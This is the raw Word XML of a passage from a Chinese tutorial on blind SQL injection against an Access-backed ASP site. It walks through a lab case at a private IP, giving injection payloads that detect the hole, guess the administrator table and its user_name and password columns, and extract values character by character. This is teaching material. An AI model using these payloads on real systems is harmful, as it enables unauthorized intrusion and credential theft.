        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="005F4269" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005F4269" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1))</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n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBD234F" w14:textId="77777777" w:rsidR="00BE4D0E" w:rsidRPr="00764DAB" w:rsidRDefault="00974D0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提交&gt;n-I时正常，而提交到&gt;n时返回出错，那么说明字段值的ASCII码为n。反查ASCII码对应的字符，就可得到字段值的第一位字符。再继续提交如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22009386" w14:textId="77777777" w:rsidR="00974D01" w:rsidRPr="00BF1BD2" w:rsidRDefault="00974D01"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and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(select </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>top 1 asc(mid(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段名,</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1))</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  from 数据库表名 )</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B283F0B" w14:textId="77777777" w:rsidR="00974D01" w:rsidRPr="00764DAB" w:rsidRDefault="00974D0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用与上面相同的方法，可得到第二位字符。再继续进行查询，直接猜解出字段的所有字符值为止。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220747CA" w14:textId="77777777" w:rsidR="00A47C25" w:rsidRPr="00F838F6" w:rsidRDefault="00A47C25" w:rsidP="00604925">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F838F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Access注入攻击案例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C59CC1B" w14:textId="77777777" w:rsidR="00A47C25" w:rsidRPr="00764DAB" w:rsidRDefault="009600D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漏洞链接地址为:http://192.168.1.55:901/news_view.asp?id=14 分别提交“and 1=1”和"and 1=2"返回不同页面，说明存在注入漏洞(图7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF7D25E" w14:textId="77777777" w:rsidR="009600DC" w:rsidRDefault="009600DC" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51DBFA85" wp14:editId="7F269FFF">
            <wp:extent cx="5274310" cy="311147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274310" cy="3111473"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4E4095" w14:textId="77777777" w:rsidR="009600DC" w:rsidRDefault="009600DC" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测到注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E106546" w14:textId="77777777" w:rsidR="009600DC" w:rsidRPr="00F32178"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5.1</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009600DC" w:rsidRPr="00F32178">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>猜解数据库表名和字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360A23C5"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来猜解数据库表名，提交如下网址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0B0147"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exists(select * from users)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473CC9EC"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错误信息，说明users表不存在，继续提交。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021B475E"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exists(select * from admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8D9273"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还是返回错误信息，说明admin表不存在，继续提交。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3138338D" w14:textId="77777777" w:rsidR="002F0441" w:rsidRPr="00764DAB" w:rsidRDefault="002F04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 xml:space="preserve">http://192.168.1.55:901/news_view.asp?id=14 and exists(select * from </w:t>
      </w:r>
      <w:r w:rsidR="005C65EF" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541E76AC" w14:textId="77777777" w:rsidR="002F0441" w:rsidRPr="00764DAB" w:rsidRDefault="005C65E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页面，</w:t>
      </w:r>
      <w:r w:rsidR="00D53176" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>说明存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>administrator表</w:t>
      </w:r>
      <w:r w:rsidR="00E266EF" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(图8 存在administrator表与不存在</w:t>
      </w:r>
      <w:r w:rsidR="00442737" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的表</w:t>
      </w:r>
      <w:r w:rsidR="00E266EF" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对比)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBB8525" w14:textId="77777777" w:rsidR="00E266EF" w:rsidRDefault="00E266EF" w:rsidP="00901209">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6524"/>
        </w:tabs>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E266EF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07D4F81F" wp14:editId="103F61C1">
            <wp:extent cx="5273977" cy="3578086"/>
            <wp:effectExtent l="19050" t="0" r="2873"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274310" cy="3578312"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EF9C0E" w14:textId="77777777" w:rsidR="00E266EF" w:rsidRDefault="00E266EF" w:rsidP="00901209">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6524"/>
        </w:tabs>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E266EF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidRPr="00E266EF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">8 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E266EF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00E266EF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00E266EF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表与不存在</w:t>
      </w:r>
      <w:r w:rsidR="007F1997">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的表</w:t>
      </w:r>
      <w:r w:rsidRPr="00E266EF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对比</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E42A717" w14:textId="77777777" w:rsidR="00E266EF" w:rsidRPr="00E266EF" w:rsidRDefault="00E266EF" w:rsidP="00901209">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6524"/>
        </w:tabs>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E110DAC" w14:textId="77777777" w:rsidR="00D53176" w:rsidRPr="00764DAB" w:rsidRDefault="0012479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继续猜测字段并提交。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F46640A" w14:textId="77777777" w:rsidR="00124797" w:rsidRPr="00764DAB" w:rsidRDefault="0012479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exists(select user</w:t>
      </w:r>
      <w:r w:rsidR="0042787F" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> from administrator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A78A47A" w14:textId="77777777" w:rsidR="0042787F" w:rsidRPr="00764DAB" w:rsidRDefault="0042787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错误信息，说明不存在username字段，继续提交。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314ADC26" w14:textId="77777777" w:rsidR="0042787F" w:rsidRPr="00764DAB" w:rsidRDefault="0042787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exists(select user_name from administrator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEC7300" w14:textId="77777777" w:rsidR="00124797" w:rsidRPr="00764DAB" w:rsidRDefault="0042787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页面，administrator表中存在字段user_name</w:t>
      </w:r>
      <w:r w:rsidR="004D4C23" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（图9）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D048EA2" w14:textId="77777777" w:rsidR="005C65EF" w:rsidRPr="002F0441" w:rsidRDefault="005C65EF" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42E0A934" w14:textId="77777777" w:rsidR="002F0441" w:rsidRDefault="00124797" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A95EE32" wp14:editId="14DFE024">
            <wp:extent cx="5274310" cy="276286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274310" cy="2762867"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC80D40" w14:textId="77777777" w:rsidR="004D4C23" w:rsidRDefault="004D4C23" w:rsidP="00901209">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6524"/>
        </w:tabs>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E266EF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00E266EF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>user_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段</w:t>
      </w:r>
      <w:r w:rsidRPr="00E266EF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与不存在对比</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B13686" w14:textId="77777777" w:rsidR="006661A3" w:rsidRPr="00764DAB" w:rsidRDefault="006661A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再提交：http://192.168.1.55:901/news_view.asp?id=14 and exists(select password from administrator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4185B08F" w14:textId="77777777" w:rsidR="00AA1C44" w:rsidRPr="00764DAB" w:rsidRDefault="006661A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页面，说明administrator表中存在字段password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D33DC8" w14:textId="77777777" w:rsidR="00AA1C44" w:rsidRPr="00375957"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5.2</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AA1C44" w:rsidRPr="00375957">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>猜解字段长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F607B6" w14:textId="77777777" w:rsidR="00AA1C44" w:rsidRPr="00764DAB" w:rsidRDefault="00E712C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再继续猜测第一个字段内容长度。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339293BB" w14:textId="77777777" w:rsidR="004D4C23" w:rsidRPr="00764DAB" w:rsidRDefault="00E712C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len(user_name) from administrator)&gt;1//正常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193A32C6" w14:textId="77777777" w:rsidR="005F0513" w:rsidRPr="00764DAB" w:rsidRDefault="005F05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len(user_name) from administrator)&gt;2  //正常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BA8522" w14:textId="77777777" w:rsidR="005F0513" w:rsidRPr="00764DAB" w:rsidRDefault="005F05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len(user_name) from administrator)&gt;5  //报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569253D3" w14:textId="77777777" w:rsidR="005F0513" w:rsidRPr="00764DAB" w:rsidRDefault="005F05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administrator表中的user_name 字段长度为5(图10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A6A3C3" w14:textId="77777777" w:rsidR="005F0513" w:rsidRDefault="005F0513" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BA66EBC" wp14:editId="6AF32232">
            <wp:extent cx="5273979" cy="3267986"/>
            <wp:effectExtent l="19050" t="0" r="2871"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274310" cy="3268191"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E54F14" w14:textId="77777777" w:rsidR="005F0513" w:rsidRPr="005F0513" w:rsidRDefault="00EA7F4D" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA7F4D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测到字段长度为</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA7F4D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55176092" w14:textId="77777777" w:rsidR="00EA7F4D" w:rsidRPr="00295B94"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5.3</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00EA7F4D" w:rsidRPr="00295B94">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>猜解字段内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE0A49E" w14:textId="77777777" w:rsidR="005F0513" w:rsidRPr="00764DAB" w:rsidRDefault="003E0CA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现在猜解字段内容并提交。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5118419A" w14:textId="77777777" w:rsidR="003E0CA4" w:rsidRPr="00764DAB" w:rsidRDefault="003E0CA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1,1)) from administrator)&gt;</w:t>
      </w:r>
      <w:r w:rsidR="002D191A" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00821B90" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  //返回正常页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9982B2" w14:textId="77777777" w:rsidR="007E4353" w:rsidRPr="00764DAB" w:rsidRDefault="003E0CA4" w:rsidP="003D5726">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ASCII值</w:t>
      </w:r>
      <w:r w:rsidR="002D191A" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>大</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>于0 ,字段值应该为</w:t>
      </w:r>
      <w:r w:rsidR="002D191A" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字母</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006C790B" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果是小于0那么说明是汉字，下面我们</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>继续猜解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E37A0A8" w14:textId="77777777" w:rsidR="0095552D" w:rsidRPr="00764DAB" w:rsidRDefault="009555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1,1)) from administrator)&gt;</w:t>
      </w:r>
      <w:r w:rsidR="002D191A" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>500</w:t>
      </w:r>
      <w:r w:rsidR="00821B90" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  //返回错误页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171B3D80" w14:textId="77777777" w:rsidR="002D191A" w:rsidRPr="003D5726" w:rsidRDefault="002D191A" w:rsidP="003D5726">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字段对应的ASCll值在0和500之间。继续提交。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1323A1" w14:textId="77777777" w:rsidR="00821B90" w:rsidRPr="00764DAB" w:rsidRDefault="009555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1,1)) from administrator)&gt;</w:t>
      </w:r>
      <w:r w:rsidR="002D191A" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidR="00821B90" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">   //</w:t>
      </w:r>
      <w:r w:rsidR="002D191A" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回错误页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784A9FF1" w14:textId="77777777" w:rsidR="002D191A" w:rsidRPr="00764DAB" w:rsidRDefault="002D191A" w:rsidP="003D5726">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字段对应的ASCll值在0和100之间。继续提交。</w:t>
      </w:r>
    </w:p>
